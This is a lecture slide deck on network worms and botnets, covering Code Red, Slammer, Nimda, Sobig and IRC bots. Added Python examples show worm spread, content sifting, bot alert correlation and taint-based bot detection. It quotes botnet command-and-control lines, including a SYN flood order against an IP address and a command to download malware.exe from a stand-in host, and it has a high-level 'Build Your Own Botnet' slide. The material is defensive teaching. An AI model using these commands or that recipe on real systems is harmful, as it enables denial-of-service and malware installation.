c - Mehran UET Scholars
Network Worms and Bots

Outline
- Worms
  - Worm examples and propagation methods
  - Detection methods
    - Traffic patterns: EarlyBird
    - Vulnerabilities: Generic Exploit Blocking
  - Disabling worms
    - Generate signatures for network or host-based filters
- Bots
  - Structure and use of bots
  - Recognizing bot propagation
  - Recognizing bot operation
    - Network-based methods
    - Host-based methods
Worm
- A worm is self-replicating software designed to spread through the network
  - Typically exploits security flaws in widely used services
- Can cause enormous damage
  - Launch DDoS attacks, install bot networks
  - Access sensitive information
  - Cause confusion by corrupting the sensitive information

Worm vs Virus vs Trojan horse
- A virus is code embedded in a file or program
- Viruses and Trojan horses rely on human intervention
- Worms are self-contained and may spread autonomously
Cost of worm attacks
- Morris worm, 1988
  - Infected approximately 6,000 machines
    - 10% of computers connected to the Internet
  - Cost ~ $10 million in downtime and cleanup
- Code Red worm, July 16 2001
  - Direct descendant of Morris' worm
  - Infected more than 500,000 servers
  - Programmed to go into infinite sleep mode July 28
  - Caused ~ $2.6 billion in damages
- Love Bug worm: $8.75 billion
Statistics: Computer Economics Inc., Carlsbad, California
Internet Worm (first major attack)
- Released November 1988
- Program spread through Digital, Sun workstations
  - Exploited Unix security vulnerabilities
  - VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code
- Consequences
  - No immediate damage from program itself
  - Replication and threat of damage
    - Load on network, systems used in attack
    - Many systems shut down to prevent further attack
Some historical worms of note

Worm      Date   Distinction
Morris    11/88  Used multiple vulnerabilities, propagate to "nearby" systems
ADM       5/98   Random scanning of IP address space
Ramen     1/01   Exploited three vulnerabilities
Lion      3/01   Stealthy, rootkit worm
Cheese    6/01   Vigilante worm that secured vulnerable systems
Code Red  7/01   First significant Windows worm; completely memory resident
Walk      8/01   Recompiled source code locally
Nimda     9/01   Windows worm: client-to-server, c-to-c, s-to-s, ...
Scalper   6/02   11 days after announcement of vulnerability; peer-to-peer network of compromised systems
Slammer   1/03   Used a single UDP packet for explosive growth

Source: Kienzle and Elder
Increasing propagation speed
- Code Red, July 2001
  - Affects Microsoft Index Server 2.0, the Windows 2000 Indexing service on Windows NT 4.0, and Windows 2000 systems that run IIS 4.0 and 5.0 Web servers
  - Exploits known buffer overflow in Idq.dll
  - Vulnerable population (360,000 servers) infected in 14 hours
- SQL Slammer, January 2003
  - Affects Microsoft SQL 2000
  - Exploits known buffer overflow vulnerability
    - Server Resolution service vulnerability reported June 2002
    - Patch released in July 2002, Bulletin MS02-39
  - Vulnerable population infected in less than 10 minutes
Code Red
- Initial version released July 13, 2001
- Sends its code as an HTTP request
- HTTP request exploits buffer overflow
- Malicious code is not stored in a file
  - Placed in memory and then run
- When executed,
  - Worm checks for the file C:\Notworm
    - If file exists, the worm thread goes into infinite sleep state
  - Creates new threads
    - If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses
Code Red of July 13 and July 19
- Initial release of July 13
  - 1st through 20th of each month: spread via random scan of 32-bit IP address space
  - 20th through end of each month: attack
    - Flooding attack against 198.137.240.91 (www.whitehouse.gov)
  - Failure to seed random number generator -> linear growth (every copy scans the same address sequence)
- Revision released July 19, 2001
  - White House responds to threat of flooding attack by changing the address of www.whitehouse.gov
  - Causes Code Red to die for date ≥ 20th of the month
  - But: this time random number generator correctly seeded
Slides: Vern Paxson
Code Red 2
- Released August 4, 2001
- Comment in code: "Code Red 2."
  - But in fact completely different code base
- Payload: a root backdoor, resilient to reboots
- Bug: crashes NT, only works on Windows 2000
- Localized scanning: prefers nearby addresses
- Kills Code Red 1
- Safety valve: programmed to die Oct 1, 2001
Slides: Vern Paxson
Striving for Greater Virulence: Nimda
- Released September 18, 2001
- Multi-mode spreading:
  - attack IIS servers via infected clients
  - email itself to address book as a virus
  - copy itself across open network shares
  - modifying Web pages on infected servers w/ client exploit
  - scanning for Code Red II backdoors (!)
    - worms form an ecosystem!
- Leaped across firewalls
Slides: Vern Paxson
Figure (slides: Vern Paxson): infection timeline of the 2001 worm ecosystem, annotated in order: Code Red 2 kills off Code Red 1; CR 1 returns thanks to bad clocks; Nimda enters the ecosystem; Code Red 2 settles into weekly pattern; Code Red 2 dies off as programmed.
How do worms propagate?
- Scanning worms
  - Worm chooses "random" address
- Coordinated scanning
  - Different worm instances scan different addresses
- Flash worms
  - Assemble tree of vulnerable hosts in advance, propagate along tree
  - Not observed in the wild, yet
  - Potential for 10^6 hosts in < 2 sec! [Staniford]
- Meta-server worm
  - Ask server for hosts to infect (e.g., Google for "powered by phpbb")
- Topological worm:
  - Use information from infected hosts (web server logs, email address books, config files, SSH "known hosts")
- Contagion worm
  - Propagate parasitically along with normally initiated communication
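The random-scanning model above, and the Code Red v1 seeding bug from the earlier slide, can both be seen in a small epidemic simulation. This is an added example (not code from the slides or from any worm); the address space of 2^16, the 2,000 vulnerable hosts and the scan rate are constructed toy parameters, and the "shared_seed" mode models what an unseeded rand() does: every copy walks the identical address sequence from its start, so only the oldest copy ever probes new addresses and the infected count grows roughly linearly instead of exponentially.

```python
import random


def simulate(mode, space=1 << 16, vulnerable=2000, scans_per_tick=10,
             ticks=60, seed=1):
    """Return the number of infected hosts after each tick.

    mode == "random":      each copy draws scan targets from its own RNG.
    mode == "shared_seed": every copy replays the same fixed address sequence
                           from index 0, which is what an unseeded rand() does.
    All sizes are constructed toy parameters, not Code Red's real 32-bit space.
    """
    rng = random.Random(seed)
    vuln = set(rng.sample(range(space), vulnerable))  # vulnerable population
    patient_zero = min(vuln)
    infected = {patient_zero}
    private = {patient_zero: random.Random(rng.getrandbits(32))}  # "random" mode
    shared_rng = random.Random(0)   # "shared_seed" mode: one sequence for all
    shared_seq = []
    position = {patient_zero: 0}    # how far each copy has walked shared_seq
    history = []
    for _ in range(ticks):
        newly = set()
        for host in infected:
            for _ in range(scans_per_tick):
                if mode == "shared_seed":
                    i = position[host]
                    while len(shared_seq) <= i:
                        shared_seq.append(shared_rng.randrange(space))
                    target = shared_seq[i]
                    position[host] = i + 1
                else:
                    target = private[host].randrange(space)
                if target in vuln and target not in infected:
                    newly.add(target)
        for h in newly:
            infected.add(h)
            position[h] = 0          # a fresh copy restarts the sequence
            private[h] = random.Random(rng.getrandbits(32))
        history.append(len(infected))
    return history


def compare(ticks=60):
    """Final infected count for both modes over the same vulnerable set."""
    return {m: simulate(m, ticks=ticks)[-1] for m in ("random", "shared_seed")}


if __name__ == "__main__":
    for mode in ("random", "shared_seed"):
        h = simulate(mode)
        print(f"{mode:12s}", [h[t] for t in range(0, 60, 10)], "final", h[-1])
```

In "shared_seed" mode the number of distinct addresses probed by the whole population equals the number probed by patient zero alone, so the infected count is bounded by ticks × scans_per_tick, while in "random" mode the curve is the familiar sigmoid that saturates the vulnerable population long before the run ends.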
Worm Detection and Defense
- Detect via honeyfarms: collections of "honeypots"
  - Any outbound connection from honeyfarm = worm
    - (at least, that's the theory)
  - Distill signature from inbound/outbound traffic
  - If honeypot covers N addresses, expect detection when worm has infected 1/N of population
- Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts

Signature inference
- 5 minutes to several weeks to write a signature
- Several hours or more for testing
- Monitor network and look for strings common to traffic with worm-like behavior
- Signatures can then be used for content filtering
Slide: S Savage
Content sifting
- Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...)
- Two consequences
  - Content Prevalence: W will be more common in traffic than other bitstrings of the same length
  - Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations
- Content sifting: find W's with high content prevalence and high address dispersion and drop that traffic
Slide: S Savage
The basic algorithm (animation over five slides; Stefan Savage, UCSD)
Figure: a detector sits in the network among hosts A, B, C, D, E and cnn.com. As packets pass, each fingerprinted content string gets a row in a Prevalence Table (how many packets carried it) and in an Address Dispersion Table (the distinct sources and distinct destinations of those packets). Reconstructed final state after the five frames:

Prevalence Table
  worm string:   3
  other string:  1

Address Dispersion Table
                 Sources        Destinations
  worm string:   3 (A, B, D)    3 (B, D, E)
  other string:  1 (C)          1 (A)

Across the frames the worm string's counts rise with every packet (prevalence 1 -> 2 -> 3; sources A -> A,B -> A,B,D; destinations B -> B,D -> B,D,E), while the benign string, seen once from C to A, stays at 1 in every column.
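The prevalence and dispersion tables from the animation, as a runnable added example (not EarlyBird's code and not from the slides). It indexes every fixed-length byte window of each payload, keeps the two tables, and reports a window only when both its prevalence and its source and destination dispersion pass a threshold; the packet stream is constructed to mirror the figure (a worm payload with an invented invariant travelling A→B, B→D, D→E, and one benign request from C to A). The real system fingerprints substrings with Rabin hashes and samples them to keep up with line rate; the window length of 8 bytes here is a constructed toy value.

```python
from collections import defaultdict


class ContentSifter:
    """Toy EarlyBird-style content sifter (added example).

    Every fixed-length substring of each packet payload is counted in a
    prevalence table and in per-substring source/destination sets.  A
    substring is reported when both its prevalence and its address dispersion
    reach the thresholds.
    """

    def __init__(self, window=8, prevalence_threshold=3, dispersion_threshold=3):
        self.window = window
        self.prevalence_threshold = prevalence_threshold
        self.dispersion_threshold = dispersion_threshold
        self.prevalence = defaultdict(int)      # substring -> packet count
        self.sources = defaultdict(set)         # substring -> distinct sources
        self.destinations = defaultdict(set)    # substring -> distinct destinations

    def substrings(self, payload):
        """All window-length byte substrings of one payload (each counted once)."""
        w = self.window
        return {payload[i:i + w] for i in range(len(payload) - w + 1)}

    def _over_threshold(self, s):
        return (self.prevalence[s] >= self.prevalence_threshold
                and len(self.sources[s]) >= self.dispersion_threshold
                and len(self.destinations[s]) >= self.dispersion_threshold)

    def observe(self, src, dst, payload):
        """Update the tables for one packet; return substrings now over threshold."""
        flagged = set()
        for s in self.substrings(payload):
            self.prevalence[s] += 1
            self.sources[s].add(src)
            self.destinations[s].add(dst)
            if self._over_threshold(s):
                flagged.add(s)
        return flagged

    def report(self):
        """Rows (substring, prevalence, sources, destinations) over threshold."""
        return sorted(
            (s, self.prevalence[s], sorted(self.sources[s]), sorted(self.destinations[s]))
            for s in self.prevalence if self._over_threshold(s))


# Constructed packet stream mirroring the slide animation.
WORM_INVARIANT = b"\x90\x90\xeb\x0eINVARIANT-WORM-BYTES"   # invented invariant
PACKETS = [
    ("A", "B", b"POST /vuln.cgi?" + b"N" * 16 + WORM_INVARIANT),
    ("C", "A", b"GET /index.html HTTP/1.1\r\nHost: cnn.com\r\n"),
    ("B", "D", b"POST /vuln.cgi?" + b"X" * 16 + WORM_INVARIANT),
    ("D", "E", b"POST /vuln.cgi?" + b"Y" * 16 + WORM_INVARIANT),
]


def sift(packets=PACKETS):
    """Run the stream through a sifter; return (sifter, substrings flagged)."""
    sifter = ContentSifter()
    flagged = set()
    for src, dst, payload in packets:
        flagged |= sifter.observe(src, dst, payload)
    return sifter, flagged


if __name__ == "__main__":
    sifter, flagged = sift()
    for row in sifter.report():
        print(row)
```

Only windows common to all three worm packets (the request prefix and the invariant) end up with prevalence 3, sources {A, B, D} and destinations {B, D, E}; the per-packet filler bytes and the benign request never pass. With windows this short, common protocol tokens would also become prevalent and dispersed in real traffic, which is one reason the thresholds and the window length matter in practice.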
Challenges (Stefan Savage, UCSD)
- Computation
  - To support a 1Gbps line rate we have 12 µs to process each packet, at 10Gbps 1.2 µs, at 40Gbps...
  - Dominated by memory references; state expensive
  - Content sifting requires looking at every byte in a packet
- State
  - On a fully-loaded 1Gbps link a naïve implementation can easily consume 100MB/sec for table
  - Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM
Worm summary
- Worm attacks
  - Many ways for worms to propagate
  - Propagation speed is increasing
  - Polymorphic worms, other barriers to detection
- Detect
  - Traffic patterns: EarlyBird
  - Watch attack: TaintCheck and Sting
  - Look at vulnerabilities: Generic Exploit Blocking
- Disable
  - Generate worm signatures and use in network or host-based filters
Botnet
- Collection of compromised hosts
  - Spread like worms and viruses
  - Once installed, respond to remote commands
- Platform for many attacks
  - Spam forwarding (70% of all spam?)
  - Click fraud
  - Keystroke logging
  - Distributed denial of service attacks
- Serious problem
  - Top concern of banks, online merchants
  - Vint Cerf: ¼ of hosts connected to Internet
What are botnets used for?
Figure: capability matrix of bot families. The column labels survive only as truncated by extraction (ago, DSNX, evil, G-SyS, sd, Spy); the rows are the capabilities, and the individual check marks could not be mapped back to cells:
  - create port redirect
  - other proxy
  - download file from web
  - DNS resolution
  - UDP/ping floods
  - other DDoS floods
  - scan/spread
  - spam
  - visit URL
Capabilities are exercised via remote commands.
Building a Bot Network
Figure (two frames): the attacker launches compromise attempts against a mix of hosts (Win XP, FreeBSD, Mac OS X, Win XP); where an attempt succeeds, the host is marked compromised and bot software is installed on it.

Step 2
Figure: each compromised Win XP host rallies on an IRC server by issuing
  /connect jade.va.us.dal.net
  /join #hacker
and the server (labelled jade.va.dal.net in the figure) sees the bots arrive.

Step 3
(12:59:27pm) -- A9-pcgbdv ([email protected]) has joined (#owned) Users : 1646
(12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62
(12:59:27pm) -- A6-bpxufrd ([email protected]) has joined (#owned) Users : 1647
(12:59:27pm) -- A9-nzmpah ([email protected]) has left IRC (Connection reset by peer)
(12:59:28pm) (@PhaTTy) .scan.enable DCOM
(12:59:28pm) -- A9-tzrkeasv ([email protected]) has joined (#owned) Users : 1650
Figure: how a botnet is monetized (labels only survive): Spam service, Rent-a-bot, Cash-out, Pump and dump, Botnet rental.
Underground commerce
- Market in access to bots
  - Botherd: collects and manages bots
  - Access to proxies ("peas") sold to spammers, often with commercial-looking web interface
  - Sample rates
    - Non-exclusive access to botnet: 10¢ per machine
    - Exclusive access: 25¢
  - Payment via compromised account (e.g. PayPal) or cash to dropbox
- Identity Theft
  - Keystroke logging
  - Complete identities available for $25 - $200+
    - Rates depend on financial situation of compromised person
    - Include all info from PC files, plus all websites of interest with passwords/account info used by PC owner
    - At $200+, usually includes full credit report
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]
Sobig.a In Action
- Arrives as an email attachment
  - Written in C++
  - Encrypted with Telock to slow analysis
- User opens attachment, launching trojan
- Downloads file from a free Geocities account
  - Contains list of URLs pointing to second stage
- Fetches second-stage trojan
  - Arbitrary executable file – could be anything
  - For Sobig.a, second-stage trojan is Lala

Stage 2 – Lala
- Communication
  - Lala notifies a cgi script on a compromised host
  - Different versions of Lala have different sites and cgi scripts, perhaps indicating tracking by author
- Installation
  - Lala installs a keylogger and password-protected Lithium remote access trojan
  - Lala downloads Stage 3 trojan
    - Wingate proxy (commercial software)
- Cleanup
  - Lala removes the Sobig.a trojan

Stage 3 – Wingate
- Wingate is a general-purpose port proxy server

  Port       Service
  555/TCP    RTSP
  608/TCP    Remote Control
  1180/TCP   SOCKS
  1181/TCP   Telnet Proxy
  1182/TCP   WWW Proxy
  1183/TCP   FTP Proxy
  1184/TCP   POP3 Proxy
  1185/TCP   SMTP Server

- Final state of compromised machine
  - Complete remote control by Lithium client with password "adm123"
  - Complete logging of user's keystrokes
  - Usable for spam relay, http redirects
  - Wingate Gatekeeper client can connect to 608/TCP, can log/change everything
Build Your Own Botnet
- Pick a vector mechanism
  - IRC Channels: DCC Filesends, Website Adverts to Exploit Sites
  - Scan & Sploit: MSBlast
  - Trojan: SoBig/BugBear/ActiveX Exploits
- Choose a Payload
  - Backdoors
    - Agobot, SubSeven, DeepThroat
  - Most include mechanisms for DDoS, Self-spreading, download/exec arbitrary code, password stealers.
- Do it
  - Compromise an IRC server, or use your own zombied machines
  - Configure Payload to connect to selected server
  - Load encryption keys and codes
  - Release through appropriate compromised systems
  - Sit back and wait, or start on your next Botnet
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]
Bot detection methods
- Signature-based (most AV products)
- Rule-based
  - Monitor outbound network connections (e.g. ZoneAlarm, BINDER)
  - Block certain ports (25, 6667, ...)
- Hybrid: content-based filtering
  - Match network packet contents to known command strings (keywords)
  - E.g. Gaobot ddos cmds: .ddos.httpflood
- Network traffic monitoring
  - Wenke Lee, Phil Porras: BotHunter, ...
    - Correlate various NIDS alarms to identify "bot infection sequence"
  - GA Tech: Recognize traffic patterns associated with ddns-based rallying
  - Stuart Staniford, FireEye
    - Detect port scanning to identify suspicious traffic
    - Emulate host with taint tracking to identify exploit
BotHunter: passive bot detection
- Snort-based sensor suite for malware event detection
  - inbound scan detection
  - remote to local exploit detection
  - anomaly detection system for exploits over key TCP protocols
  - Botnet specific egg download banners
  - Victim-to-C&C-based communications exchanges, particularly for IRC bot protocols
- Event correlator
  - combines information from sensors to recognize bots that infect and coordinate with your internal network assets
  - Submits "bot-detection profiles" to the Cyber-TA repository infrastructure
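The two network-side ideas on the preceding slides, keyword matching of packet contents against known command strings and correlating several NIDS alarms into one "bot infection sequence", fit together in a small correlator. This is an added example, not BotHunter's code: the alert tuples are constructed (the C&C command text is taken from the IRC log and Gaobot example on the slides, the addresses are documentation ranges), the mapping from sensor to dialog stage is this example's own simplification, and the declaration rule (an exploit plus one later stage, or two later stages) follows BotHunter's published dialog model as best I recall it, so treat the exact condition as an assumption.

```python
import ipaddress
import re
from collections import defaultdict

INTERNAL = ipaddress.ip_network("192.168.1.0/24")   # constructed monitored network

# Dialog stages, named after BotHunter's E1..E5 (labels are this example's).
E1, E2, E3, E4, E5 = ("E1 inbound scan", "E2 exploit", "E3 egg download",
                      "E4 C&C traffic", "E5 outbound scan")

# Command keywords seen on the slides: .ddos.synflood, .scan.enable, .ddos.httpflood
CC_COMMAND = re.compile(r"(^|\s)\.(ddos|scan|http)\.\w+")


def is_internal(addr):
    try:
        return ipaddress.ip_address(addr) in INTERNAL
    except ValueError:          # e.g. a CIDR block in the destination field
        return False


def classify(alert):
    """Map one sensor alert to (victim host, dialog stage), or None."""
    _ts, sensor, src, dst, detail = alert
    if sensor == "scan":
        if is_internal(dst) and not is_internal(src):
            return dst, E1
        if is_internal(src) and not is_internal(dst):
            return src, E5
    elif sensor == "exploit" and is_internal(dst):
        return dst, E2
    elif sensor == "http" and is_internal(src) and "binary download" in detail:
        return src, E3
    elif sensor == "irc" and is_internal(src) and CC_COMMAND.search(detail):
        return src, E4
    return None


def correlate(alerts):
    """Return {internal host: set of dialog stages observed}."""
    profiles = defaultdict(set)
    for alert in alerts:
        hit = classify(alert)
        if hit:
            host, stage = hit
            profiles[host].add(stage)
    return dict(profiles)


def declared_bots(profiles):
    """Assumed rule: exploit + one later stage, or any two later stages."""
    later = {E3, E4, E5}
    bots = []
    for host, stages in profiles.items():
        later_hits = len(stages & later)
        if (E2 in stages and later_hits >= 1) or later_hits >= 2:
            bots.append(host)
    return sorted(bots)


ALERTS = [  # constructed sensor output: (timestamp, sensor, src, dst, detail)
    ("12:59:10", "scan",    "203.0.113.7",  "192.168.1.20", "inbound portscan 135/tcp"),
    ("12:59:12", "exploit", "203.0.113.7",  "192.168.1.20", "DCOM RPC overflow attempt"),
    ("12:59:20", "http",    "192.168.1.20", "203.0.113.9",  "GET /bot.exe (binary download)"),
    ("12:59:27", "irc",     "192.168.1.20", "198.51.100.4", ".ddos.synflood 216.209.82.62"),
    ("12:59:28", "irc",     "192.168.1.20", "198.51.100.4", ".scan.enable DCOM"),
    ("12:59:40", "scan",    "192.168.1.20", "10.0.0.0/8",   "outbound portscan 135/tcp"),
    ("13:01:00", "http",    "192.168.1.30", "203.0.113.9",  "GET /index.html"),
    ("13:02:00", "irc",     "192.168.1.30", "198.51.100.4", "hello everyone"),
    ("13:05:00", "irc",     "192.168.1.40", "198.51.100.4", ".ddos.httpflood example.test 80"),
]

if __name__ == "__main__":
    profiles = correlate(ALERTS)
    for host, stages in sorted(profiles.items()):
        print(host, sorted(stages))
    print("declared bots:", declared_bots(profiles))
```

The point of the correlation step shows in the third internal host: a single keyword hit (192.168.1.40) is recorded in its profile but does not by itself declare a bot, while the host that exhibits the full infection sequence is declared on the strength of several independent sensors.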
Botnets network traffic patterns
- Unique characteristic: "rallying"
  - Bots spread like worms and trojans
  - Payloads may be common backdoors
  - Centralized control of botnet is characteristic feature
- Georgia Tech idea: DNS
  - Bots installed at network edge
  - IP addresses may vary, use Dynamic DNS
  - Bots talk to controller, make DDNS lookup
  - Pattern of DDNS lookup is easy to spot for common botnets!
David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)
BotSwat
- Host-based bot detection
- Based on idea of remote control commands

What does remote control look like?
- http.execute <URL> <local_path>
- Invoke system calls:
  - connect, network send and recv, create file, write file, ...
- On arguments received over the network:
  - IP to connect to, object to request, file name, ...

Botswat premise
- We can distinguish the behavior of bots from that of innocuous processes via detecting "remote control"
- We can approximate "remote control" as "using data received over the network in a system call argument"

Figure: the command http.execute www.badguy.com/malware.exe C:\WIN\bad.exe arrives through the NIC of a Windows XP host running agobot; numbered steps 1-8 trace it from the NIC through the bot to the system calls it triggers, of which the labelled ones are connect(…,www.badguy.com,…) (step 5), send(…,"…GET /malware.exe…",…) (step 7) and fcreate(…,"C:\WIN\malware.exe",…) (step 8), each with an argument derived from the received command.
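The premise on this slide, "network data reaching a system call argument", can be demonstrated with a toy taint tracker. This is an added example and not BotSwat's implementation: a str subclass carries a taint flag through the string operations a command parser uses, a monitor checks every argument of a simulated system call, and a constructed agobot-style handler for the http.execute command from the slide is run beside a benign updater that makes the same three calls with values from a local configuration line. Real BotSwat tracks taint at the byte level inside the process; the class names, the deny policy and the updater are this example's own.

```python
class Taint(str):
    """str that carries a 'tainted' flag and propagates it through
    concatenation, slicing and split (the operations a command parser uses)."""

    def __new__(cls, value, tainted=False):
        obj = super().__new__(cls, value)
        obj.tainted = tainted
        return obj

    def _wrap(self, value, other=None):
        return Taint(value, self.tainted or getattr(other, "tainted", False))

    def __add__(self, other):
        return self._wrap(str(self) + str(other), other)

    def __radd__(self, other):          # plain_str + tainted keeps the taint
        return self._wrap(str(other) + str(self), other)

    def __getitem__(self, key):
        return self._wrap(str(self)[key])

    def split(self, sep=None, maxsplit=-1):
        return [self._wrap(part) for part in str(self).split(sep, maxsplit)]


class SyscallMonitor:
    """Checks every argument of a monitored call for taint.  A tainted
    argument means network-received data reached a system call, which is the
    'remote control' behaviour the slide describes."""

    def __init__(self):
        self.alerts = []                # (syscall name, tainted argument values)

    def call(self, name, *args):
        tainted = [str(a) for a in args if getattr(a, "tainted", False)]
        if tainted:
            self.alerts.append((name, tainted))
            return False                # constructed policy: deny the call
        return True


def recv(data):
    """Stand-in for recv(): everything from the socket is tainted at the source."""
    return Taint(data, tainted=True)


def run_bot(monitor, wire_command):
    """Constructed agobot-style handler for 'http.execute <URL> <local_path>'."""
    op, url, local_path = recv(wire_command).split()
    if op == "http.execute":
        host, path = url.split("/", 1)
        monitor.call("connect", host, 80)
        monitor.call("send", "GET /" + path + " HTTP/1.0\r\n\r\n")
        monitor.call("fcreate", local_path)


def run_updater(monitor, config_line):
    """The same three calls made by a legitimate updater whose server and
    file name come from a local configuration line, not from the network."""
    host, local_path = config_line.split()
    monitor.call("connect", host, 443)
    monitor.call("send", "GET /update.bin HTTP/1.0\r\n\r\n")
    monitor.call("fcreate", local_path)


def flagged_calls(wire_command):
    """Names of the system calls that received tainted arguments."""
    monitor = SyscallMonitor()
    run_bot(monitor, wire_command)
    return [name for name, _ in monitor.alerts]


if __name__ == "__main__":
    m = SyscallMonitor()
    run_bot(m, "http.execute www.badguy.com/malware.exe C:\\WIN\\bad.exe")
    print("bot:", m.alerts)
    m = SyscallMonitor()
    run_updater(m, "updates.example.test C:\\app\\update.bin")
    print("updater:", m.alerts)
```

All three of the bot's calls are flagged because host, request path and file name all descend from the received command, while the updater, which makes identical calls with locally sourced arguments, raises nothing. The approximation cuts both ways, as the slide's wording "approximate" admits: a browser that opens a URL taken from a received page would also trip this rule, which is why a deployable version needs a more refined notion of which network data counts as a command.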